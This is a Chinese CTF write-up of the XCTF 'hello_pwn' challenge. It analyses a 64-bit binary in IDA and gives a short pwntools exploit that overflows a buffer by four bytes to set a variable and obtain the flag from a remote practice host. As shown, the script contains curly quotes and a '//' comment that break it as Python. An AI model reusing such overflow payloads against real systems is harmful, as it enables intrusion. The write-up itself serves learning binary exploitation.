热门标签 | HotTags
当前位置:  开发笔记 > 编程语言 > 正文

XCTFPWN_xctfpwn:初探Hello_Pwn漏洞利用技术

本文由编程笔记#小编为大家整理,主要介绍了xctf-pwn hello_pwn相关的知识,希望对你有一定的参考价值。 走流程,看看文件类型64位,开了个NX直接丢IDA分析查看sub_400686()
本文由编程笔记#小编为大家整理,主要介绍了xctf-pwn hello_pwn相关的知识,希望对你有一定的参考价值。


走流程,看看文件类型

技术图片

64位,开了个NX

直接丢IDA分析

技术图片

查看sub_400686()

技术图片

是个给flag的函数,可以看到,只要满足if语句的条件使dword_60106C == 1853186401就可以得到flag。

计算偏移量

技术图片

0x6C-0x68=0x4所以偏移量是4,简单的覆盖变量接下来就直接写exp了

exp:
from pwn import*
p = remote(‘111.198.29.45‘,32077)
payload=‘a‘*4+p64(0x6E756161) //1853186401转成了16进制(不转也行)
p.recvuntil("lets get helloworld for bof
")

p.sendline(payload)
p.interactive()

技术图片


推荐阅读
author-avatar
ecrbw_9870105634
这个家伙很懒,什么也没留下!
PHP1.CN | 中国最专业的PHP中文社区 | DevBox开发工具箱 | json解析格式化 |PHP资讯 | PHP教程 | 数据库技术 | 服务器技术 | 前端开发技术 | PHP框架 | 开发工具 | 在线工具
Copyright © 1998 - 2020 PHP1.CN. All Rights Reserved | 京公网安备 11010802041100号 | 京ICP备19059560号-4 | PHP1.CN 第一PHP社区 版权所有